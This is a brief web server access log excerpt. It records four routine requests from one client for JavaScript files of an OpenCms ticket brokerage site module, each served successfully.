31.192.197.154 - - [29/Jun/2024:00:57:18 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923
31.192.197.154 - - [29/Jun/2024:00:57:18 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.fancybox.pack.js HTTP/1.1" 200 23187
31.192.197.154 - - [29/Jun/2024:00:57:18 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/stickyfill.min.js HTTP/1.1" 200 5672
31.192.197.154 - - [29/Jun/2024:00:57:18 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
